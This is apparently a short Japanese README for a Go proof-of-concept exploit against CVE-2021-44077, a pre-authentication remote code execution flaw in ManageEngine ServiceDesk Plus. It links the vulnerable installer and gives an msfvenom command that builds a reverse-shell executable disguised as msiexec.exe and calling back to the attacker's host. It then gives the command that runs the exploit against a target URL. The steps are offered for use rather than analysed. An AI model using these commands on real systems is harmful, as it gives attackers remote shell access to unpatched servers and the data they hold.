
CVE-2021-44077 向け Golang 製 Proof of Concept Exploit: ManageEngine ServiceDesk Plus (< 11306) における PreAuth RCE
このエクスプロイトは、Zoho ManageEngine ServiceDesk Plus < 11306 における認証なしの RCE です。
脆弱性のあるバージョンのソフトウェアはこちら: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
これの Golang 版が見つからなかったので、ここに置いておきます。私のコードはあまり良くないので、自己責任で使用してください。
ブログ記事:
現在のディレクトリに悪意のあるペイロードを作成します。
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
次に、エクスプロイトを実行します。
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u は脆弱な URL です -f は悪意のあるファイルです